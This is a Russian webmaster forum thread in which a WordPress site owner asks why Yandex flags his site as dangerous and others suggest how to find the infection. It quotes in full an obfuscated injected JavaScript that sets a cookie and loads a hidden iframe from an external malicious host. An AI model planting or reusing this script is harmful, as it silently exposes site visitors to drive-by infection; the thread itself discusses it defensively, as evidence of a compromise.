Сайт может угрожать безопасности вашего компьютера или мобильного устройства

[Kino]

Ситуация вот какая...

Есть сайт. В Гугле он на 1-2 месте в топе по своим запросам и всё ок с ним. В Яндексе - на 5-6 месте.

Недавно ко мне пришло письмо, в котором Платоны сообщили мне, что

Цитата:

В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Да, и пример кода там тоже был.

Цитата:

<script type='text/javascript'>var a=!1; if(-1==document.cookie.indexOf("lonly")){x0="ht";x5="/in.c";var d=new Date;x3="gi?2";d.setTime(d.getTime());ddf="analyze .pl.tf";ed=new Date(d.getTime()+72E6);dtf="tp://";document.cookie="lonly="+escape(ed.toGMTString() )+";expires="+ed.toGMTString()+";path=/";df=x0+dtf+ddf+x5+x3;var e=-1!=navigator.userAgent.toLowerCase().indexOf("fire fox"),f="1",j=function(){};j.prototype={b:function (){i=43724;this.ha="";u="u";return df},a:function(){q="q";dN=49709;this.Z=46019;w=""; rJ=a;this.z="";var g=document; cR=kQ=a;this.O="";var k=window;dO="";var h=this;this.j=this.v="";this.na=64509;this.h="rQ"; pK="";this.s=39122;this.da="dY";this.J="fA";this.Y ="dE";fQ=cD="";this.k="sE";try{uK=17600;this.qa="p C";this.Q="bZR";this.P=41545;cL=pW="";this.oa="nU" ;wK=a;this.R=eSU="";rO=pOR=this.la=a;this.r=eK=kVQ ="";qB=a;mF="mF";this.U=a;this.G="";this.I="bY";vW ="getsetAttrisdf";this.aa="";this.W="zS";wE=this.T =a;this.S="";this.ca=a;this.d=55903;this.V=33170;g K=62679;var b=[];qR=vS=a;this.D="";e||(f="0");b.push("height", "substring","trecreateElementget","width","vbmifrs et",vW,"body","appendChild",f,g,"src");this.F=a;th is.$=42071;this.m=21002;eO=64506;this.q=55314;yT=" ";hS=a;this.n=aU=uKD="";fK=a;yI=this.i=this.f="";w I="wI";sJ=11632;this.ka=a;rG="";this.o=a;this.l=40 171;aA=4550;gL=40598;var l=b[2][b[1]](3,16);this.H=this.p=nZ="";this.u="uX";gP="gP";thi s.ma="nAO";var m=b[4][b[1]](3,6);cO=52931;this.t=a;this.K=44254;this.N=21921; vK=m+"ame";tI="tI";lO="lO";this.ia="mO";jZ=24453;v ar n=b[5][b[1]](3,11);this.fa=this.ja= "";p=n+"bute";this.ba="dH";qU=this.C="";rJQ=a; var o=h.b();this.c=tT="";var c=b[9][l](vK);this.A="";this.X="iZ";c[b[10]]=o;nD=a;mIO="mIO";this.pa="";c[b[3]]=b[8];oH=40281;this.ga="";kM="kM";c[b[0]]=b[8];this.e=58620;mH=this.B="";bW="bW";wY="";b[9][b[6]][b[7]](c);kR="";this.w=a;fVT=""}catch(s){hK="",this.M=45 116,lKT=a,this.g="rD",g.write("\u003C\u0068\u0074\ u006D\u006C\u003E\u003C\u0062\u006F\u0064\u0079\u0 03E\u003C\u002F\u0062\u006F\u0064\u0079\u003E\u003 C\u002F\u0068\u0074\u006D\u006C\u003E"),this.ea=a, uIE="",this.L="fI",k.setTimeout(function(){h.a()}, 233),iGB=29282,zN=6951}iS=""}};cB="";var r=new j;gT="";r.a()};</script>

В вебмастере следующее:

Цитата:

http://**** 27.01.2012 Поведенческий анализ

Зашел на эту страницу, стал сам искать код - не вышло. Так как я не большой специалист по части php и html, то обратился к двум знакомым. Они тоже просмотрели и ничего не нашли.

Написал снова Платонам, что всё устранено, никакого кода больше нет.

Пришел ответ:

Цитата:

Здравствуйте!

К сожалению, данный код все еще фиксируется на сайте, но появляется не при каждом заходе (т.н. "мигающий вирус").

Пожалуйста, проверьте все файлы сайта еще раз. Если Вам удастся найти у себя в файлах источник заражения, мы будем крайне признательны, если Вы пришлете нам образец этого кода, и сообщите, где именно он находился. Это очень поможет нам в борьбе с этим видом заражения.

Кто может помочь? Сайт на WordPress.

[MS555]

Kino, какая версия WordPress?

[Kino]

MS555, последняя. Всегда обновляю сразу (или почти сразу).

[aship]

Цитата:

Сообщение от Kino

Кто может помочь? Сайт на WordPress.

1. Посмотрите, не появилось ли среди папочек вашего вордпресса, какой-нибудь папки, которой там раньше не было.
2. Поищите find'ом файлы, которые были изменены, за пару недель до реакции Яндекса. С высокой долей вероятности отловите залитый к вам шелл.

[Mistery]

С такими вопросами лучше к хакерам обращаться. Они обычно фишку быстро просекают.

Да, искать нужно среди новых файлов и последних изменений, может быть сравнить те коды, которые есть в исходном Вордпрессе и том, что у вас сейчас крутиться.

И ещё (не уверена, что мыслю верно), но - если вирус как-то к вам попал, то может у хостера ещё спросить, как?

[Kino]

Цитата:

Сообщение от Mistery

С такими вопросами лучше к хакерам обращаться. Они обычно фишку быстро просекают.

Это и сделал.

[e-visitor]

Интересно, чем дело закончилось? Нашли причину?
У меня похожая ситуация. Достали уже. Третий раз в этом году сайт закрывает Яндекс.

[Клон]

Цитата:

Сообщение от Mistery

Да, искать нужно среди новых файлов и последних изменений

да те злыдни дату изменения файла могут любую поставить

[fsb-sasha]

Цитата:

Сообщение от Клон

да те злыдни дату изменения файла могут любую поставить

+1

Kino, нужно искать измененные файлы, смотрите логи сервера (хотя их тоже почистить можно)

[Kino]

Опа, моя тема всплыла.

Да, тогда ситуация конечно решилась. Обратился к специалисту по этим делам, нашел вирус в коде.

Что примечательно. Этот код показывал себя только один раз в сутки одному IP-адресу. То есть первый раз он атакует комп, после чего сутки не трогает этот IP. И ещё примечательно, что сам код находился не на этом сайте, а на другом, который, по сути, унылое Г, но находился на одном хостинге с этим. Короче, решилась проблема.

Кажется, тот же чувак, что мне помогал, не так давно и на этом форуме темку создал. Я тогда его на сраче нашел.